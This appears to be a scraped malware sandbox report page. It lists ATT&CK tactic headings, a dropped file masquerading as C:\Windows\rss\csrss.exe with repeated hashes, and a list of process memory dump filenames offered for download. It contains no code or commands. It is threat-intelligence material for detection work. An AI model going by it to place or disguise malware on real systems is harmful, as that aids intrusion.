Query Registry

1

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\rss\csrss.exe
Filesize
3.9MB

MD5
7fc701478f1d43c3e62ff6d9c434ee77

SHA1
790ba947810a29810ca9d5738abc6b03c9805cce

SHA256
5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb

SHA512
d1ede33eeeb3d5d2dd44f73fda21bef9ae60c6a9c10d71aa9d5b57d2b233c7793f7b0e1deea1bf74f5084191bc86afa5ccb60803051efbe9491a3960a515e456

Download Submit
\Windows\rss\csrss.exe
Filesize
3.9MB

MD5
7fc701478f1d43c3e62ff6d9c434ee77

SHA1
790ba947810a29810ca9d5738abc6b03c9805cce

SHA256
5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb

SHA512
d1ede33eeeb3d5d2dd44f73fda21bef9ae60c6a9c10d71aa9d5b57d2b233c7793f7b0e1deea1bf74f5084191bc86afa5ccb60803051efbe9491a3960a515e456

Download Submit
\Windows\rss\csrss.exe
Filesize
3.9MB

MD5
7fc701478f1d43c3e62ff6d9c434ee77

SHA1
790ba947810a29810ca9d5738abc6b03c9805cce

SHA256
5f3248f2c25a744211d4c4d877a8d2f81c6b57e1411482169d95eeb74c063eeb

SHA512
d1ede33eeeb3d5d2dd44f73fda21bef9ae60c6a9c10d71aa9d5b57d2b233c7793f7b0e1deea1bf74f5084191bc86afa5ccb60803051efbe9491a3960a515e456

Download Submit
memory/300-75-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/300-71-0x0000000000DE0000-0x0000000001188000-memory.dmp

Filesize
3.7MB

Download
memory/300-73-0x0000000001190000-0x0000000001995000-memory.dmp

Filesize
8.0MB

Download
memory/300-68-0x0000000000000000-mapping.dmp

Download
memory/300-74-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/300-72-0x0000000000DE0000-0x0000000001188000-memory.dmp

Filesize
3.7MB

Download
memory/432-62-0x0000000000000000-mapping.dmp

Download
memory/432-63-0x000007FEFBCD1000-0x000007FEFBCD3000-memory.dmp

Filesize
8KB

Download
memory/620-59-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/620-54-0x0000000000EF0000-0x0000000001298000-memory.dmp

Filesize
3.7MB

Download
memory/620-58-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/620-57-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/620-56-0x00000000012A0000-0x0000000001AA5000-memory.dmp

Filesize
8.0MB

Download
memory/620-55-0x0000000000EF0000-0x0000000001298000-memory.dmp

Filesize
3.7MB

Download
memory/888-61-0x0000000000000000-mapping.dmp

Download
memory/1792-60-0x0000000000C90000-0x0000000001038000-memory.dmp

Filesize
3.7MB

Download
memory/1792-70-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/1792-65-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/1792-64-0x0000000000C90000-0x0000000001038000-memory.dmp

Filesize
3.7MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads